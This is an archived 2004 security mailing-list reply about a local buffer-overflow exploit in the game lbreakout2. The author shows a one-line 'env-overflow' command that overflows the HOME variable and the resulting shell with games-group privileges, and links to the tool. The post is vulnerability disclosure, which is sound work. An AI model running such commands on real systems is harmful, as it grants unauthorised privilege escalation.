Re: lbreakout2 < 2.4beta-2 local exploit
From: Steve Kemp (steve_at_steve.org.uk)
Date: 02/23/04
- Previous message: Donato Ferrante: "Multiple Remote Buffer Overflow in Avirt Soho 4.3"
- In reply to: Li0n7_at_voila.fr: "lbreakout2 < 2.4beta-2 local exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 23 Feb 2004 20:26:03 +0000 To: Li0n7@voila.fr
On Sun, Feb 22, 2004 at 01:45:45PM -0000, Li0n7@voila.fr wrote:
> /*
> * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
> * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
> * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
> *
> */
I much prefer mine ;)
Using the `env-overflow` tool this may be exploited without
the need for a valid X11 display - ie. ssh/telnet access
sufficient - or any explicit coding:
skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
... snip ...
sh-2.05a$
sh-2.05a$ id
uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)
Where env-overflow lives here:
http://www.steve.org.uk/Hacks/generic.html
Steve
-- # Debian Security Audit Project http://www.shellcode.org/Audit/
- Previous message: Donato Ferrante: "Multiple Remote Buffer Overflow in Avirt Soho 4.3"
- In reply to: Li0n7_at_voila.fr: "lbreakout2 < 2.4beta-2 local exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
